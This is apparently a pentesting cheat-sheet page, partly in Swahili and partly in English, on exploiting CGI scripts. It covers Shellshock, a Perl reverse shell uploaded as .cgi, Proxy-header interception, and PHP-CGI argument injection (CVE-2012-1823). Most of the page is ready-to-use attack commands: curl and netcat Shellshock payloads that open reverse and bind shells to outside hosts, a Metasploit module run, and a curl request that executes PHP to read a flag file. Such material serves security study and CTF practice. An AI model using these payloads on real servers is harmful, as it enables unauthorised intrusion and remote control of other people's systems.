Information

The CGI scripts are perl scripts, so, if you have compromised a server that can execute .cgi scripts you can upload a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from .pl to .cgi, give execute permissions (chmod +x) and access the reverse shell from the web browser to execute it. In order to test for CGI vulns it's recommended to use nikto -C all (and all the plugins)

ShellShock

ShellShock ni udhaifu unaoathiri Bash shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash kuendesha amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa mabadiliko ya mazingira, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatanisha kodhi mbaya kwenye mabadiliko ya mazingira, ambayo inatekelezwa mara tu inapopewa mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo.

Kukabili udhaifu huu ukurasa unaweza kutoa kosa.

Unaweza kupata udhaifu huu kwa kutambua kwamba inatumia toleo la zamani la Apache na cgi_mod (ikiwa na folda ya cgi) au kutumia nikto.

Test

Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba ile string itarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu.

Nmap

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl (reflected, blind and out-of-band)

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Shellsocker

python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

Kutilia mkazo

#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

Proxy (MitM to Web server requests)

CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com"

Kama variable ya HTTP_PROXY inaweza kutumika na seva ya wavuti. Jaribu kutuma kichwa chenye: "Proxy: <IP_attacker>:<PORT>" na ikiwa seva itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na seva.

Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Kimsingi ikiwa cgi iko hai na php ni "ya zamani" (<5.3.12 / < 5.4.2) unaweza kutekeleza msimbo. Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la seva ya wavuti bila kutuma vigezo (hasa bila kutuma herufi "="). Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano /index.php?-s (angalia -s) na msimbo wa chanzo wa programu utaonekana katika jibu.

Kisha, ili kupata RCE unaweza kutuma uchunguzi huu maalum: /?-d allow_url_include=1 -d auto_prepend_file=php://input na msimbo wa PHP utakaotekelezwa katika mwili wa ombi. Mfano:

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

Maelezo zaidi kuhusu vuln na uwezekano wa exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, Mfano wa CTF Writeup.